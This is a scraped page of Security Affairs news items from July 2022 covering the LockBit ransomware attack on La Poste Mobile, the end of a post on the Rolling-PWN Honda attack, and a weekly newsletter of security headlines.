try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Rolling-PWN Attack)

The post Experts demonstrate how to unlock several Honda models via Rolling-PWN attack appeared first on Security Affairs.

Categories: Cyber Security News

French telephone operator La Poste Mobile suffered a ransomware attack

Security Affairs - Sun, 07/10/2022 - 12:07
French virtual mobile telephone operator La Poste Mobile was hit by a ransomware attack that impacted administrative and management services. 

The ransomware attack hit the virtual mobile telephone operator La Poste Mobile on July 4 and paralyzed administrative and management services. 

The company pointed out that threat actors may have accessed data of its customers, for this reason it is recommending them to be vigilant. The company highlight the risks of identity theft or phishing attacks in case their data have been compromised.

“The administrative and management services of La Poste Mobile fell victim, on Monday July 4, to a malicious ransomware-type virus. As soon as we became aware of this incident, we took the necessary protective measures by immediately suspending the computer systems concerned. This protective action has led us to temporarily close our website and our customer area,” reads a statement published by the company on its website that is still down. “Our IT teams are currently diagnosing the situation. Our first analyses establish that our servers essential to the operation of your mobile line have been well protected. On the other hand, it is possible that files present in the computers of La Poste Mobile employees have been affected. Some of them may contain personal data.”

For any additional information concerning personal data, customers can contact La Poste Telecom customer service at the following address: [email protected]

Who is behind the attack?

The Lockbit ransomware operation added the name of La Poste Mobile on its leaksite overnight from Thursday to Friday. 

La revendication est apparue en pleine nuit sur la vitrine de #LockBit 3.0 : un affidé de la franchise a attaqué #LaPosteMobile. La réalité matérielle de l'attaque ne fait pas un doute, même si celle-ci était presque passée inaperçue… #ransomware https://t.co/Ef7u7jOah0

— Valéry Rieß-Marchive (@ValeryMarchive) July 8, 2022

The gang has been active since at least 2019 and today it is one of the most active ransomware gangs. Recently, the Lockbit ransomware operation has released LockBit 3.0, which has important novelties such as a bug bounty program, Zcash payment, and new extortion tactics.

Recent incidents attributed to the group include attacks on a Foxconn factory, a Canadian fighter jet training company, and a popular German library service.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, ransomware)

The post French telephone operator La Poste Mobile suffered a ransomware attack appeared first on Security Affairs.

Categories: Cyber Security News

Security Affairs newsletter Round 373 by Pierluigi Paganini

Security Affairs - Sun, 07/10/2022 - 10:41
A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs for free in your email box. Apple Lockdown Mode will protect users against highly targeted cyberattacksFortinet addressed multiple vulnerabilities in several productsRozena backdoor delivered by exploiting the Follina bugOngoing Raspberry Robin campaign leverages compromised QNAP devicesEvolution of the LockBit Ransomware operation relies on new techniquesCisco fixed a critical arbitrary File Overwrite flaw in Enterprise Communication solutionsEmsisoft: Victims of AstraLocker and Yashma ransomware can recover their files for freeDiscussing the risks of bullying for anonymous social app NGLRussian Cybercrime Trickbot Group is systematically attacking UkraineNew Checkmate ransomware target QNAP NAS devices
Large-scale cryptomining campaign is targeting the NPM JavaScript package repository
North Korea-linked APTs use Maui Ransomware to target the Healthcare industryENISA released the Threat Landscape MethodologyOrBit, a new sophisticated Linux malware still undetectedOpenSSL version 3.0.5 fixes a flaw that could potentially lead to RCEMarriott International suffered a new data breach, attackers stole 20GB of dataCyberattacks against law enforcement are on the riseLess popular, but very effective, Red-Teaming Tool BRc4 used in attacks in the wildNew Hive ransomware variant is written in Rust and use improved encryption method
Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro
Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflictThreat actors compromised British Army ’s Twitter, YouTube accounts to promote crypto scamsAstraLocker ransomware operators shut down their operationsGoogle fixes the fourth Chrome zero-day in 2022Data of a billion Chinese residents available for sale on a cybercrime forumPopular Django web framework affected by a SQL Injection flaw. Upgrade it now!Unfaithful HackerOne employee steals bug reports to claim additional bountiesThreat Report Portugal: Q2 2022CISA orders federal agencies to patch CVE-2022-26925 by July 22
Tens of Jenkins plugins are affected by zero-day vulnerabilities
Microsoft: Raspberry Robin worm already infected hundreds of networks

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

The post Security Affairs newsletter Round 373 by Pierluigi Paganini appeared first on Security Affairs.

Categories: Cyber Security News

Pages